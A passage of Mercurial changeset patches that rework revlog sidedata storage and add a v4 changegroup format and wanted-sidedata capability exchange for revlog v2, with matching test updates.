""" - return _processflagsfunc(revlog, text, flags, b'write', sidedata=sidedata)[ - :2 - ] + return _processflagsfunc( + revlog, + text, + flags, + b'write', + )[:2] def processflagsread(revlog, text, flags): @@ -145,14 +148,14 @@ return _processflagsfunc(revlog, text, flags, b'raw')[1] -def _processflagsfunc(revlog, text, flags, operation, sidedata=None): +def _processflagsfunc(revlog, text, flags, operation): """internal function to process flag on a revlog This function is private to this module, code should never needs to call it directly.""" # fast path: no flag processors will run if flags == 0: - return text, True, {} + return text, True if operation not in (b'read', b'write', b'raw'): raise error.ProgrammingError(_(b"invalid '%s' operation") % operation) # Check all flags are known. @@ -168,7 +171,6 @@ if operation == b'write': orderedflags = reversed(orderedflags) - outsidedata = {} for flag in orderedflags: # If a flagprocessor has been registered for a known flag, apply the # related operation transform and update result tuple. @@ -186,10 +188,9 @@ if operation == b'raw': vhash = rawtransform(revlog, text) elif operation == b'read': - text, vhash, s = readtransform(revlog, text) - outsidedata.update(s) + text, vhash = readtransform(revlog, text) else: # write operation - text, vhash = writetransform(revlog, text, sidedata) + text, vhash = writetransform(revlog, text) validatehash = validatehash and vhash - return text, validatehash, outsidedata + return text, validatehash diff --git a/mercurial/revlogutils/sidedata.py b/mercurial/revlogutils/sidedata.py --- a/mercurial/revlogutils/sidedata.py +++ b/mercurial/revlogutils/sidedata.py @@ -13,9 +13,8 @@ The current implementation is experimental and subject to changes. Do not rely on it in production. -Sidedata are stored in the revlog itself, within the revision rawtext. They -are inserted and removed from it using the flagprocessors mechanism. 
The following -format is currently used:: +Sidedata are stored in the revlog itself, thanks to a new version of the +revlog. The following format is currently used:: initial header: <number of sidedata; 2 bytes> @@ -60,48 +59,35 @@ SIDEDATA_ENTRY = struct.Struct('>HL20s') -def sidedatawriteprocessor(rl, text, sidedata): +def serialize_sidedata(sidedata): sidedata = list(sidedata.items()) sidedata.sort() - rawtext = [SIDEDATA_HEADER.pack(len(sidedata))] + buf = [SIDEDATA_HEADER.pack(len(sidedata))] for key, value in sidedata: digest = hashutil.sha1(value).digest() - rawtext.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) + buf.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) for key, value in sidedata: - rawtext.append(value) - rawtext.append(bytes(text)) - return b''.join(rawtext), False + buf.append(value) + buf = b''.join(buf) + return buf -def sidedatareadprocessor(rl, text): +def deserialize_sidedata(blob): sidedata = {} offset = 0 - (nbentry,) = SIDEDATA_HEADER.unpack(text[: SIDEDATA_HEADER.size]) + (nbentry,) = SIDEDATA_HEADER.unpack(blob[: SIDEDATA_HEADER.size]) offset += SIDEDATA_HEADER.size dataoffset = SIDEDATA_HEADER.size + (SIDEDATA_ENTRY.size * nbentry) for i in range(nbentry): nextoffset = offset + SIDEDATA_ENTRY.size - key, size, storeddigest = SIDEDATA_ENTRY.unpack(text[offset:nextoffset]) + key, size, storeddigest = SIDEDATA_ENTRY.unpack(blob[offset:nextoffset]) offset = nextoffset # read the data associated with that entry nextdataoffset = dataoffset + size - entrytext = text[dataoffset:nextdataoffset] + entrytext = bytes(blob[dataoffset:nextdataoffset]) readdigest = hashutil.sha1(entrytext).digest() if storeddigest != readdigest: raise error.SidedataHashError(key, storeddigest, readdigest) sidedata[key] = entrytext dataoffset = nextdataoffset - text = text[dataoffset:] - return text, True, sidedata - - -def sidedatarawprocessor(rl, text): - # side data modifies rawtext and prevent rawtext hash validation - return False - - -processors = 
( - sidedatareadprocessor, - sidedatawriteprocessor, - sidedatarawprocessor, -) + return sidedata diff --git a/tests/flagprocessorext.py b/tests/flagprocessorext.py --- a/tests/flagprocessorext.py +++ b/tests/flagprocessorext.py @@ -31,28 +31,28 @@ return False -def noopdonothing(self, text, sidedata): +def noopdonothing(self, text): return (text, True) def noopdonothingread(self, text): - return (text, True, {}) + return (text, True) -def b64encode(self, text, sidedata): +def b64encode(self, text): return (base64.b64encode(text), False) def b64decode(self, text): - return (base64.b64decode(text), True, {}) + return (base64.b64decode(text), True) -def gzipcompress(self, text, sidedata): +def gzipcompress(self, text): return (zlib.compress(text), False) def gzipdecompress(self, text): - return (zlib.decompress(text), True, {}) + return (zlib.decompress(text), True) def supportedoutgoingversions(orig, repo): diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -300,7 +300,7 @@ text = rawtext else: r = flagutil.processflagsread(self, rawtext, flags) - text, validatehash, sidedata = r + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -271,12 +271,13 @@ $ hg ci --amend -m 'copy a to j, v2' saved backup bundle to $TESTTMP/repo/.hg/strip-backup/*-*-amend.hg (glob) $ hg debugsidedata -c -v -- -1 - 1 sidedata entries - entry-0014 size 24 - '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' + 1 sidedata entries (missing-correct-output !) + entry-0014 size 24 (missing-correct-output !) + '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' (missing-correct-output !) 
#endif $ hg showcopies --config experimental.copies.read-from=filelog-only - a -> j + a -> j (sidedata missing-correct-output !) + a -> j (no-sidedata !) The entries should be written to extras even if they're empty (so the client won't have to fall back to reading from filelogs) $ echo x >> j @@ -354,7 +355,8 @@ saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) $ hg st --change . --copies A b - a + a (sidedata missing-correct-output !) + a (no-sidedata !) R a $ cd .. diff --git a/tests/test-revlog-raw.py b/tests/test-revlog-raw.py --- a/tests/test-revlog-raw.py +++ b/tests/test-revlog-raw.py @@ -51,10 +51,10 @@ def readprocessor(self, rawtext): # True: the returned text could be used to verify hash text = rawtext[len(_extheader) :].replace(b'i', b'1') - return text, True, {} + return text, True -def writeprocessor(self, text, sidedata): +def writeprocessor(self, text): # False: the returned rawtext shouldn't be used to verify hash rawtext = _extheader + text.replace(b'1', b'i') return rawtext, False @@ -293,7 +293,7 @@ # Verify text, rawtext, and rawsize if isext: - rawtext = writeprocessor(None, text, {})[0] + rawtext = writeprocessor(None, text)[0] else: rawtext = text if rlog.rawsize(rev) != len(rawtext): diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata.py @@ -40,19 +40,20 @@ return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) +def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): + text, sd = orig(self, nodeorrev, *args, **kwargs) if getattr(self, 'sidedatanocheck', False): - return text + return text, sd + if self.version & 0xFFFF != 2: + return text, sd if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: raise 
RuntimeError('text size mismatch') expected = sd[sidedata.SD_TEST2] got = hashlib.sha256(text).digest() if got != expected: raise RuntimeError('sha256 mismatch') - return text + return text, sd def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): @@ -81,7 +82,7 @@ def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) + extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) extensions.wrapfunction( upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion ) # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729230 -3600 # Fri Feb 19 11:07:10 2021 +0100 # Node ID 4cd214c9948d40d006fc09df0c20f090f387d426 # Parent 3d740058b46787c133fd43b3f6252bfa2bae47d6 revlogv2: don't assume that the sidedata of the last rev is right after data We are going to be rewriting sidedata soon, it's going to be appended to the revlog data file, meaning that the data and the sidedata might not be contiguous. Differential Revision: https://phab.mercurial-scm.org/D10025 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -920,7 +920,7 @@ # Derived from index values. def end(self, rev): - return self.start(rev) + self.length(rev) + self.sidedata_length(rev) + return self.start(rev) + self.length(rev) def parents(self, node): i = self.index @@ -2331,7 +2331,8 @@ curr = len(self) prev = curr - 1 - offset = self.end(prev) + + offset = self._get_data_offset(prev) if self._concurrencychecker: if self._inline: @@ -2417,6 +2418,26 @@ self._chainbasecache[curr] = deltainfo.chainbase return curr + def _get_data_offset(self, prev): + """Returns the current offset in the (in-transaction) data file. 
+ Versions < 2 of the revlog can get this in O(1), revlog v2 needs a docket + file to store that information: since sidedata can be rewritten to the + end of the data file within a transaction, you can have cases where, for + example, rev `n` does not have sidedata while rev `n - 1` does, leading + to `n - 1`'s sidedata being written after `n`'s data. + + TODO cache this in a docket file before getting out of experimental.""" + if self.version & 0xFFFF != REVLOGV2: + return self.end(prev) + + offset = 0 + for rev, entry in enumerate(self.index): + sidedata_end = entry[8] + entry[9] + # Sidedata for a previous rev has potentially been written after + # this rev's end, so take the max. + offset = max(self.end(rev), offset, sidedata_end) + return offset + def _writeentry( self, transaction, ifh, dfh, entry, data, link, offset, sidedata ): # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613666212 -3600 # Thu Feb 18 17:36:52 2021 +0100 # Node ID a41565bef69f7e0224a15dff8f381f1a77d0da66 # Parent 4cd214c9948d40d006fc09df0c20f090f387d426 changegroup: add v4 changegroup for revlog v2 exchange This change only adds the required infrastructure for the new changegroup format and does not do any actual exchange. This will be done in the next patches.
Differential Revision: https://phab.mercurial-scm.org/D10026 diff --git a/hgext/remotefilelog/remotefilelog.py b/hgext/remotefilelog/remotefilelog.py --- a/hgext/remotefilelog/remotefilelog.py +++ b/hgext/remotefilelog/remotefilelog.py @@ -306,6 +306,7 @@ assumehaveparentrevisions=False, deltaprevious=False, deltamode=None, + sidedata_helpers=None, ): # we don't use any of these parameters here del nodesorder, revisiondata, assumehaveparentrevisions, deltaprevious @@ -333,6 +334,8 @@ baserevisionsize=None, revision=revision, delta=delta, + # Sidedata is not supported yet + sidedata=None, ) def revdiff(self, node1, node2): diff --git a/hgext/remotefilelog/shallowbundle.py b/hgext/remotefilelog/shallowbundle.py --- a/hgext/remotefilelog/shallowbundle.py +++ b/hgext/remotefilelog/shallowbundle.py @@ -67,7 +67,7 @@ shallowcg1packer, self, nodelist, rlog, lookup, units=units ) - def generatefiles(self, changedfiles, *args): + def generatefiles(self, changedfiles, *args, **kwargs): try: linknodes, commonrevs, source = args except ValueError: @@ -92,7 +92,9 @@ [f for f in changedfiles if not repo.shallowmatch(f)] ) - return super(shallowcg1packer, self).generatefiles(changedfiles, *args) + return super(shallowcg1packer, self).generatefiles( + changedfiles, *args, **kwargs + ) def shouldaddfilegroups(self, source): repo = self._repo @@ -176,9 +178,11 @@ repo.shallowmatch = original -def addchangegroupfiles(orig, repo, source, revmap, trp, expectedfiles, *args): +def addchangegroupfiles( + orig, repo, source, revmap, trp, expectedfiles, *args, **kwargs +): if not shallowutil.isenabled(repo): - return orig(repo, source, revmap, trp, expectedfiles, *args) + return orig(repo, source, revmap, trp, expectedfiles, *args, **kwargs) newfiles = 0 visited = set() @@ -272,7 +276,7 @@ revisiondata = revisiondatas[(f, node)] # revisiondata: (node, p1, p2, cs, deltabase, delta, flags) - node, p1, p2, linknode, deltabase, delta, flags = revisiondata + node, p1, p2, linknode, deltabase, 
delta, flags, sidedata = revisiondata if not available(f, node, f, deltabase): continue diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -681,7 +681,16 @@ ): empty = True - for node, p1, p2, linknode, deltabase, delta, wireflags in deltas: + for ( + node, + p1, + p2, + linknode, + deltabase, + delta, + wireflags, + sidedata, + ) in deltas: storeflags = 0 if wireflags & repository.REVISION_FLAG_CENSORED: diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -61,7 +61,7 @@ self.repotiprev = n - 1 self.bundlerevs = set() # used by 'bundle()' revset expression for deltadata in cgunpacker.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata size = len(delta) start = cgunpacker.tell() - size diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -32,6 +32,7 @@ ) from .interfaces import repository +from .revlogutils import sidedata as sidedatamod _CHANGEGROUPV1_DELTA_HEADER = struct.Struct(b"20s20s20s20s") _CHANGEGROUPV2_DELTA_HEADER = struct.Struct(b"20s20s20s20s20s") @@ -202,7 +203,9 @@ header = self.deltaheader.unpack(headerdata) delta = readexactly(self._stream, l - self.deltaheadersize) node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode) - return (node, p1, p2, cs, deltabase, delta, flags) + # cg4 forward-compat + sidedata = {} + return (node, p1, p2, cs, deltabase, delta, flags, sidedata) def getchunks(self): """returns all the chunks contains in the bundle @@ -552,6 +555,29 @@ raise error.Abort(_(b"received dir revlog group is empty")) +class cg4unpacker(cg3unpacker): + """Unpacker for cg4 streams. + + cg4 streams add support for exchanging sidedata. 
+ """ + + version = b'04' + + def deltachunk(self, prevnode): + res = super(cg4unpacker, self).deltachunk(prevnode) + if not res: + return res + + (node, p1, p2, cs, deltabase, delta, flags, _sidedata) = res + + sidedata_raw = getchunk(self._stream) + sidedata = {} + if len(sidedata_raw) > 0: + sidedata = sidedatamod.deserialize_sidedata(sidedata_raw) + + return node, p1, p2, cs, deltabase, delta, flags, sidedata + + class headerlessfixup(object): def __init__(self, fh, h): self._h = h @@ -861,6 +887,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): """Given a source repo, construct a bundler. @@ -893,6 +920,8 @@ nodes. We store this rather than the set of nodes that should be ellipsis because for very large histories we expect this to be significantly smaller. + + remote_sidedata is the set of sidedata categories wanted by the remote. """ assert oldmatcher assert matcher @@ -988,7 +1017,7 @@ for tree, deltas in it: if tree: - assert self.version == b'03' + assert self.version in (b'03', b'04') chunk = _fileheader(tree) size += len(chunk) yield chunk @@ -1394,6 +1423,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV1_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.linknode @@ -1424,6 +1454,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV2_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, d.linknode @@ -1453,6 +1484,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags @@ -1473,12 +1505,47 @@ ) +def _makecg4packer( + repo, + oldmatcher, + matcher, + bundlecaps, + ellipses=False, + shallow=False, + ellipsisroots=None, + fullnodes=None, + remote_sidedata=None, +): + # Same header func as cg3. 
Sidedata is in a separate chunk from the delta to + # differentiate "raw delta" and sidedata. + builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack( + d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags + ) + + return cgpacker( + repo, + oldmatcher, + matcher, + b'04', + builddeltaheader=builddeltaheader, + manifestsend=closechunk(), + bundlecaps=bundlecaps, + ellipses=ellipses, + shallow=shallow, + ellipsisroots=ellipsisroots, + fullnodes=fullnodes, + remote_sidedata=remote_sidedata, + ) + + _packermap = { b'01': (_makecg1packer, cg1unpacker), # cg2 adds support for exchanging generaldelta b'02': (_makecg2packer, cg2unpacker), # cg3 adds support for exchanging revlog flags and treemanifests b'03': (_makecg3packer, cg3unpacker), + # cg4 adds support for exchanging sidedata + b'04': (_makecg4packer, cg4unpacker), } @@ -1498,11 +1565,9 @@ # # (or even to push subset of history) needv03 = True - if b'exp-sidedata-flag' in repo.requirements: - needv03 = True - # don't attempt to use 01/02 until we do sidedata cleaning - versions.discard(b'01') - versions.discard(b'02') + has_revlogv2 = requirements.REVLOGV2_REQUIREMENT in repo.requirements + if not has_revlogv2: + versions.discard(b'04') if not needv03: versions.discard(b'03') return versions @@ -1565,6 +1630,7 @@ shallow=False, ellipsisroots=None, fullnodes=None, + remote_sidedata=None, ): assert version in supportedoutgoingversions(repo) @@ -1601,6 +1667,7 @@ shallow=shallow, ellipsisroots=ellipsisroots, fullnodes=fullnodes, + remote_sidedata=remote_sidedata, ) @@ -1644,8 +1711,15 @@ fastpath=False, bundlecaps=None, matcher=None, + remote_sidedata=None, ): - bundler = getbundler(version, repo, bundlecaps=bundlecaps, matcher=matcher) + bundler = getbundler( + version, + repo, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, + ) repo = repo.unfiltered() commonrevs = outgoing.common diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py ---
a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -346,7 +346,7 @@ def showchunks(named): ui.write(b"\n%s%s\n" % (indent_string, named)) for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write( b"%s%s %s %s %s %s %d\n" % ( @@ -372,7 +372,7 @@ raise error.Abort(_(b'use debugbundle2 for this file')) gen.changelogheader() for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write(b"%s%s\n" % (indent_string, hex(node))) diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -2249,7 +2249,13 @@ def getbundlechunks( - repo, source, heads=None, common=None, bundlecaps=None, **kwargs + repo, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): """Return chunks constituting a bundle's raw data. 
@@ -2279,7 +2285,12 @@ return ( info, changegroup.makestream( - repo, outgoing, b'01', source, bundlecaps=bundlecaps + repo, + outgoing, + b'01', + source, + bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, ), ) @@ -2303,6 +2314,7 @@ source, bundlecaps=bundlecaps, b2caps=b2caps, + remote_sidedata=remote_sidedata, **pycompat.strkwargs(kwargs) ) @@ -2325,6 +2337,7 @@ b2caps=None, heads=None, common=None, + remote_sidedata=None, **kwargs ): """add a changegroup part to the requested bundle""" @@ -2355,7 +2368,13 @@ matcher = None cgstream = changegroup.makestream( - repo, outgoing, version, source, bundlecaps=bundlecaps, matcher=matcher + repo, + outgoing, + version, + source, + bundlecaps=bundlecaps, + matcher=matcher, + remote_sidedata=remote_sidedata, ) part = bundler.newpart(b'changegroup', data=cgstream) diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -417,6 +417,8 @@ mdiff.trivialdiffheader(len(data)) + data, # Flags not yet supported. 0, + # Sidedata not yet supported + {}, ) cl.addgroup( @@ -496,6 +498,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -621,6 +625,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. + {}, ) progress.increment() @@ -719,6 +725,8 @@ delta, # Flags not yet supported. 0, + # Sidedata not yet supported. 
+ {}, ) progress.increment() diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -316,7 +316,13 @@ ) def getbundle( - self, source, heads=None, common=None, bundlecaps=None, **kwargs + self, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): chunks = exchange.getbundlechunks( self._repo, @@ -324,6 +330,7 @@ heads=heads, common=common, bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, **kwargs )[1] cb = util.chunkbuffer(chunks) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2527,7 +2527,7 @@ deltacomputer = deltautil.deltacomputer(self) # loop through our set of deltas for data in deltas: - node, p1, p2, linknode, deltabase, delta, flags = data + node, p1, p2, linknode, deltabase, delta, flags, sidedata = data link = linkmapper(linknode) flags = flags or REVIDX_DEFAULT_FLAGS diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -276,6 +276,7 @@ flags=b'', baserevisionsize=None, revision=b'', + sidedata=b'', delta=None, ) checkzobject(rd) diff --git a/tests/test-revlog-raw.py b/tests/test-revlog-raw.py --- a/tests/test-revlog-raw.py +++ b/tests/test-revlog-raw.py @@ -147,6 +147,7 @@ b'flags': rlog.flags(r), b'deltabase': rlog.node(deltaparent), b'delta': rlog.revdiff(deltaparent, r), + b'sidedata': rlog.sidedata(r), } def deltaiter(self): @@ -159,10 +160,11 @@ deltabase = chunkdata[b'deltabase'] delta = chunkdata[b'delta'] flags = chunkdata[b'flags'] + sidedata = chunkdata[b'sidedata'] chain = node - yield (node, p1, p2, cs, deltabase, delta, flags) + yield (node, p1, p2, cs, deltabase, delta, flags, sidedata) def linkmap(lnode): return rlog.rev(lnode) # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613668715 -3600 # Thu Feb 18 18:18:35 2021 +0100 # Node ID 
e8c11a2c96c0b971cefcbd2efbbddb6dc92a5886 # Parent a41565bef69f7e0224a15dff8f381f1a77d0da66 delta: add sidedata field to revision delta When emitting revision delta, we need to also emit the sidedata information just added in the revlogv2 format if appropriate. Differential Revision: https://phab.mercurial-scm.org/D10027 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -288,6 +288,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -908,6 +909,10 @@ def files(self): return [] + def sidedata(self, nodeorrev, _df=None): + # Not supported for now + return {} + def storageinfo( self, exclusivefiles=False, diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -618,6 +618,13 @@ yield prefix yield data + sidedata = delta.sidedata + if sidedata is not None: + # Need a separate chunk for sidedata to be able to differentiate + # "raw delta" length and sidedata length + yield chunkheader(len(sidedata)) + yield sidedata + def _sortnodesellipsis(store, nodes, cl, lookup): """Sort nodes for changegroup generation.""" diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -453,6 +453,10 @@ """ ) + sidedata = interfaceutil.Attribute( + """Raw sidedata bytes for the given revision.""" + ) + class ifilerevisionssequence(interfaceutil.Interface): """Contains index data for all revisions of a file. 
diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -204,6 +204,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -2587,6 +2588,7 @@ dfh, alwayscache=alwayscache, deltacomputer=deltacomputer, + sidedata=sidedata, ) if addrevisioncb: diff --git a/mercurial/testing/storage.py b/mercurial/testing/storage.py --- a/mercurial/testing/storage.py +++ b/mercurial/testing/storage.py @@ -1158,7 +1158,7 @@ f = self._makefilefn() deltas = [ - (node0, nullid, nullid, nullid, nullid, delta0, 0), + (node0, nullid, nullid, nullid, nullid, delta0, 0, {}), ] with self._maketransactionfn() as tr: @@ -1214,7 +1214,9 @@ for i, fulltext in enumerate(fulltexts): delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext - deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0)) + deltas.append( + (nodes[i], nullid, nullid, nullid, nullid, delta, 0, {}) + ) with self._maketransactionfn() as tr: newnodes = [] @@ -1262,7 +1264,9 @@ ) delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n') - deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)] + deltas = [ + (b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0, {}) + ] with self._maketransactionfn() as tr: with self.assertRaises(error.CensoredBaseError): diff --git a/mercurial/utils/storageutil.py b/mercurial/utils/storageutil.py --- a/mercurial/utils/storageutil.py +++ b/mercurial/utils/storageutil.py @@ -478,6 +478,7 @@ baserevisionsize=baserevisionsize, revision=revision, delta=delta, + sidedata=sidedata, ) prevrev = rev # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613728407 -3600 # Fri Feb 19 10:53:27 2021 +0100 # Node ID bc2519513ae06df0107b5cbacafbd8b8d1b4fc6c # Parent e8c11a2c96c0b971cefcbd2efbbddb6dc92a5886 sidedata-exchange: add `wanted_sidedata` and `sidedata_computers` to repos Each repo will advertise the sidedata 
categories it requires (categories being unique and canonical), and have a set of "computers", functions to generate sidedata from `(repo, revlog, rev, previous_sidedata)`, for a given category. The set of computers can be a superset of the set of the wanted categories, but not smaller: repos are expected to be coherent in their handling of sidedata. Differential Revision: https://phab.mercurial-scm.org/D10028 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -1812,6 +1812,28 @@ return params +def format_remote_wanted_sidedata(repo): + """Formats a repo's wanted sidedata categories into a bytestring for + capabilities exchange.""" + wanted = b"" + if repo._wanted_sidedata: + wanted = b','.join( + pycompat.bytestr(c) for c in sorted(repo._wanted_sidedata) + ) + return wanted + + +def read_remote_wanted_sidedata(remote): + sidedata_categories = remote.capable(b'exp-wanted-sidedata') + return read_wanted_sidedata(sidedata_categories) + + +def read_wanted_sidedata(formatted): + if formatted: + return set(formatted.split(b',')) + return set() + + def addpartbundlestream2(bundler, repo, **kwargs): if not kwargs.get('stream', False): return @@ -1957,6 +1979,7 @@ b'version', b'nbchanges', b'exp-sidedata', + b'exp-wanted-sidedata', b'treemanifest', b'targetphase', ), @@ -1999,6 +2022,10 @@ targetphase = inpart.params.get(b'targetphase') if targetphase is not None: extrakwargs['targetphase'] = int(targetphase) + + remote_sidedata = inpart.params.get(b'exp-wanted-sidedata') + extrakwargs['sidedata_categories'] = read_wanted_sidedata(remote_sidedata) + ret = _processchangegroup( op, cg, @@ -2559,5 +2586,7 @@ part.addparam(b'treemanifest', b'1') if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + wanted = format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', wanted) return bundler diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- 
a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -945,6 +945,9 @@ if bundlecaps is None: bundlecaps = set() self._bundlecaps = bundlecaps + if remote_sidedata is None: + remote_sidedata = set() + self._remote_sidedata = remote_sidedata self._isshallow = shallow self._fullclnodes = fullnodes diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -420,7 +420,20 @@ b'unbundle wire protocol command' ) ) - + for category in sorted(bundle2.read_remote_wanted_sidedata(pushop.remote)): + # Check that a computer is registered for that category for at least + # one revlog kind. + for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + raise error.Abort( + _( + b'cannot push: required sidedata category not supported' + b" by this client: '%s'" + ) + % pycompat.bytestr(category) + ) # get lock as we might write phase data wlock = lock = None try: @@ -865,8 +878,15 @@ if not cgversions: raise error.Abort(_(b'no common changegroup version')) version = max(cgversions) + + remote_sidedata = bundle2.read_remote_wanted_sidedata(pushop.remote) cgstream = changegroup.makestream( - pushop.repo, pushop.outgoing, version, b'push' + pushop.repo, + pushop.outgoing, + version, + b'push', + bundlecaps=b2caps, + remote_sidedata=remote_sidedata, ) cgpart = bundler.newpart(b'changegroup', data=cgstream) if cgversions: @@ -1607,6 +1627,23 @@ ) % (b', '.join(sorted(missing))) raise error.Abort(msg) + for category in repo._wanted_sidedata: + # Check that a computer is registered for that category for at least + # one revlog kind. + for kind, computers in repo._sidedata_computers.items(): + if computers.get(category): + break + else: + # This should never happen since repos are supposed to be able to + # generate the sidedata they require. 
+ raise error.ProgrammingError( + _( + b'sidedata category requested by local side without local' + b"support: '%s'" + ) + % pycompat.bytestr(category) + ) + pullop.trmanager = transactionmanager(repo, b'pull', remote.url()) wlock = util.nullcontextmanager() if not bookmod.bookmarksinstore(repo): @@ -1820,6 +1857,10 @@ pullop.stepsdone.add(b'obsmarkers') _pullbundle2extraprepare(pullop, kwargs) + remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote) + if remote_sidedata: + kwargs[b'remote_sidedata'] = remote_sidedata + with pullop.remote.commandexecutor() as e: args = dict(kwargs) args[b'source'] = b'pull' @@ -2388,6 +2429,8 @@ if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + sidedata = bundle2.format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', sidedata) if ( kwargs.get('narrow', False) diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py 